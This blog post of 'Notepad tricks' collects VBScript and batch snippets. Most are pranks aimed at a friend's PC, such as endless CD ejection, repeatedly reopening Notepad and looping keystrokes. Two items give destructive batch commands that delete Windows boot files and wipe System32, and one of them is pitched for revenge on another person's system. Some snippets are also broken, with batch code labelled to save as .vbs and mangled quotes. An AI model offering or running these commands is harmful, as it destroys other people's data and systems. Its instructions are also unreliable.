Cool Notepad Tricks, Hacks & Commands

Cool Notepad Tricks, Hacks & Commands


Notepad is one of the most used utility which is pre installed in your PC. You can do a lot of things with it. Shocked? Yea! Its natural. Even, I was also shocked, when I got to know that we can play a lot of cool and awesome tricks with notepad. Yes! You have heard it right. So, Lets move further to some awesome tricks of Notepad! First of all, Let me explain What is notepad basically.

Cool notepad tricks is one of most searches keyword now a days. So, team of Dreamy Tricks is back with a exciting post in which we will share all cool notepad tricks.

1. Continually Pop Out CD Drive Using Notepad

Don’t you think it would be fun if you could play with your friend by making his cd-drive pop again and again? Just enter the text below into notepad and save it as a .vbs file. Double click on the .vbs file to see it work.

Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

2. Shutting Down Computer Using Notepad

Just imagine, if instead of pressing on start button and then on the shutdown button and then on the ok option, you could just double click on an icon to shut your system down. The Notepad trick code written below does just that. Just save the file as a .vbs file, and press it when you need to shut down the system.

@echo off
msg * System will now shut down
shutdown -c “Bye!” –s

3. Open Notepad Continually in Your Friend’s Computer

Just another Notepad trick to play with your friend’s system would be to set off a command which would open his/her notepad repetitively.

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as a .vbs file and open it to see what happens.

4. Make A Personal Log-Book or A Diary

A special feature which allows us to make a log exists in notepad. Using it we can make logs of stuff as notepad will put the date and time for us whenever we open a specific type of Log file. For doing this, just type ‘.LOG’ in the notepad and save it under any name that you wish. Now whenever you’ll open this particular file, you’ll see that notepad automatically enters the date and time at which it is opened, and then you can make a log record and save the log.

5. Matrix Effect

Now we’ll discuss a Notepad trick that can turn our command prompt into something that looks like it just came out of the matrix movie, or maybe something that looks like something straight out of a hacker’s system. For doing this, all you need to do is paste the following code in notepad

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

now you’ll need to save this file with an extension .bat , and upon clicking on the .bat file that you have created, you’ll see something like this.

6. Toggle Capslock Repeatedly Using Notepad

You can play with someone’s computer, or maybe your own computer by writing a script that can toggle Caps Lock repeatedly.

Just copy and Paste the code written down below into notepad.

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

Now save it as a .vbs file and use it to see the magic.

7. Typing Slow

This is a trick which will cause the text to be typed slowly, to try it out, just copy and paste the text below into notepad and save it as a .vbs file.

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

It does nothing but introduces a small delay between different strings it types.

8. Converting Text to Speech Using Notepad.

Just copy and paste the code down below into notepad and save as a .vbs file.  When you play it, you’ll get a dialog box asking what you want the computer to say. Have fun.

Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message

8. audio from notepad dialog box
9. Notepad is very useful Tools in windows . OK

10. Changing Header and Footer in Notepad

Go to File ->Page setup in notepad, and then in the fields for header and footer, type any of these codes.

10. header footer dialog box

&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number

11. Deleting Startup Files Using Notepad

A way to devastate a PC would be to remove the files that help it to start up. Though not advisable, this is the code that has the power to do it.

@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI
SAVE IT AS .BAT FILE.

This will shut the computer down and delete files required to get your computer into a normal state.

Don’t try doing this on your computer unless and until you wish to loose all your data.

12. Deleting System32 Files Using Notepad (Your computer os may Stop)

Wish to take revenge from someone? Just use this code, save it as an.bat file, and see what it does to that person’s system. It will delete all the System32 files required for the system to work in order.

Just paste the following in notepad and save it as a .bat file.

DEL C:\WINDOWS\SYSTEM32\*.*/Q


13. Hit Enter Continuously

What if we wished to use the function of our enter button happen again and again, a better idea than to press it again and again would be to use the code below

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

Save it as a .vbs file and see its magic

14. Hit Backspace Continuously

Ok, we need the backspace button, but what is we wish to annoy someone and make it press itself again and again, mechanically it would require some work on our part, but if we just use this code, it would become a lot more easier.

MsgBox “Backspace again and again and AGAIN”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

Save as a .vbs file to make it work.

15. Typing Something Again and Again

A code to type something again and again is mentioned below, you can use it to write anything again and again and again, until you get it out of the loop.

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “I'll be typed again and again”
loop

save it as a .vbs file to make it work.

COMMENTS

Name

(Green Living),7,2019 web development trends,1,4Sleep,1,7 day programmable thermostat,1,adjustable beds,1,adobe pdf translator,1,adobe pdf translator online,1,amerisleep as3,1,Android,1,Android and Apple Online Data Safety,1,Apple,1,aviya,1,azza mattress,1,Backlink,1,Bamboo Vs Cotton Bed Sheets,1,Bamboo vs. Cotton,1,be green,2,bedroom,1,beds for sale,1,Best Advice for Choosing The Best Sleep,1,BEST CENTRIFUGAL JUICER REVIEW INDIA,1,Best Day To Book Flights,1,Best juicer,1,best juicer 2019,4,best juicer 2020,4,BEST JUICERS BUYING GUIDE,1,BEST MASTICATING JUICER 2019,1,BEST MASTICATING JUICER 2020,1,BEST MASTICATING JUICERS IN 2020 INDIA,1,best mattress,7,best mattress for sleep apnea,1,best mattresses for back pain,1,best memory foam mattress,2,best pdf translator,1,Best Sleep Mattress For Back Pain,1,Best Time-Frame to Book Flights Tickets,1,best type of mattress for side sleepers,3,best websites 2019,1,Blogging,164,building green,2,buy sleep,2,casper mattress,1,CENTRIFUGAL JUICER,1,CENTRIFUGAL JUICER 2020,1,ChatGpt,5,cheap mattress,1,Choose a Best Sleep Mattress for Your Preferred Sleep Position,1,CHOOSE A MASTICATING JUICER,1,choose a mattress for back pain,1,choose mattress india,1,choose mattress usa,1,Computer,29,Computer Hardware Tips,2,Data Recovery,1,Design,41,digital thermostat,1,Dot Matrix Printers,1,double bed spring mattress price,2,dozebeds,1,Dye-Sublimation Printers,1,e-learning,4,eco friendly,1,eco friendly cooking,1,eco friendly electric stove,1,eco friendly kitchen appliances,1,eco friendly living room,1,eco friendly living tips,1,eco friendly paper,1,Eco Friendly Products That Really Make a Difference,1,eco friendly things in our house,1,Eco-Friendly,1,Eco-Friendly Tips for Saving Money,1,Education,120,File Recovery Software,1,Global Positioning system,1,global wifi rental,1,go green,2,go green images,1,good night's sleep meaning,1,GPRS Tracking,1,GPS technology,1,GPS Tracking,1,Green Kitchen,1,Green Living,8,green living show,1,green news,1,hand juicer,1,health,9,HEALTHY LIFE,35,Helix,1,home remedies for good sleep,2,honeywell thermostat,1,how to be a web designer from home,1,how to become a professional web designer,1,how to become a web designer from home,1,how to become web designer career,1,how to choose a mattress for back pain,1,how to choose a web designer,1,how to choose sleep mattress,1,how to get a good night sleep,2,how to make your home environmentally friendly,1,how to sleep better at night naturally,1,Ideas,190,inexpensive mattresses for sale,5,Inkjet Printers,1,Inkjet Technology,1,Internet,41,Internet Tips,162,Juice & Your Health,3,juice maker,1,juicer machine,1,Juicing versus Raw fruits and veggies,1,king mattress,1,king size mattress size,5,Know the History Facts About the Memory Foam Mattress,1,Laser Printers,2,leed certification canada,1,leed certification checklist,1,leed certification cost,1,leed certification exam,1,leed certification wiki,1,leed platinum buildings,1,life,41,loom & leaf,1,Make Money online,44,make your home green,1,MASTICATING JUICERS IN INDIA,1,mattress,1,mattress america reviews,1,mattress buying guide,1,mattress dealers,2,mattress for kids,1,mattress mattress,2,mattress selector tool,3,mattress size,3,mattress sizes,4,memory foam density guide,1,memory foam mattress,3,memory foam mattress buying guide,1,memory foam mattress information,1,memory foam mattress reviews,1,minimalist web design 2019,1,mobile malwares,1,Mobiles,70,Mother's Day 2018,1,Mother's Day Best Unique Gift Ideas 2018,1,Multi-Function Inkjet Printers,1,NASA Memory Foam Technology,1,naturally,1,navigation technology,1,nectar mattress reviews,3,needle mattress,1,new,75,new website trends 2019,1,nomad mattress,1,OMEGA JUICER,1,online pdf translator,1,Online Safety,1,orange juice,1,other,36,PDF Translator Online,1,pdf translator software,1,pocket wifi,1,Portable Inkjet Printers,1,portable wifi rental,1,POS (Point of Sale) Receipt Printer,1,Printer,1,Printers,1,programmable thermostat home depot,1,Project:LOVE NATURE,2,queen mattress,1,ransomware,1,revive mattress,1,revive mattress r2,1,RIGHT AND BEST JUICER,1,saatva,1,satellite system,1,Satnam Shri Waheguru Ji,22,SEO,38,Short Term Internet Hotspot Rental,1,should i buy a memory foam mattress,1,single mattress deals,4,skyroam,1,sleep at night fast,1,sleep mattress,4,sleep mattress near me,1,sleep mattress reviews,1,sleep mattress usa,1,Sleep Mattresses,7,sleep number bed,1,SLOW JUICER,1,slow juicer masticating juicer,1,small juicer,1,smart thermostat,1,Smartphone Security,1,smartphones,1,Software,84,Solid Ink Printers,1,Spring Mattress,1,spring mattress king size,1,spring mattress pocket spring mattress india,1,spring mattress price,1,Supermarket vs Homemade Fresh Juices,3,sustainable living communities,1,Tattoo Removal,1,tep wireless,1,The Basics of Cryptocurrency,1,the matress,1,thermostat,1,thermostats,1,tips on how to sleep through the night,2,top web design trends 2019,1,translate large pdf,1,travel wifi,1,twin mattress,1,updates,152,us mattress,8,viola,1,viruses,1,Wahegur Ji,1,ways to go green,1,web design trends 2019,1,website trends for 2019,1,what is a green apartment,1,What’s New Online,67,WhatsApp,1,which mattress is good spring or coir or foam,1,Why Choose to Go Eco-Friendly? (Green Living),1,wifi hotspot for international travel,1,winkbeds,1,zenhaven,1,
ltr
item
||ੴ||ਇੱਕ ਓਅੰਕਾਰ Satnam Shri Waheguru Ji A Web Blog about Product Review, Blogging Tips, Tech Reviews: Cool Notepad Tricks, Hacks & Commands
Cool Notepad Tricks, Hacks & Commands
Cool Notepad Tricks, Hacks & Commands
https://4.bp.blogspot.com/-quCjylMplFc/V6B9pvUimpI/AAAAAAAACSA/WK1-ddC2uQQwcBWFPlzpH9zhRiVOcTgjQCLcB/s640/increase-pc-speed.jpg
https://4.bp.blogspot.com/-quCjylMplFc/V6B9pvUimpI/AAAAAAAACSA/WK1-ddC2uQQwcBWFPlzpH9zhRiVOcTgjQCLcB/s72-c/increase-pc-speed.jpg
||ੴ||ਇੱਕ ਓਅੰਕਾਰ Satnam Shri Waheguru Ji A Web Blog about Product Review, Blogging Tips, Tech Reviews
https://www.undocopy.com/2016/08/cool-notepad-tricks-hacks-commands.html
https://www.undocopy.com/
https://www.undocopy.com/
https://www.undocopy.com/2016/08/cool-notepad-tricks-hacks-commands.html
true
4597144398420216702
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share. STEP 2: Click the link you shared to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy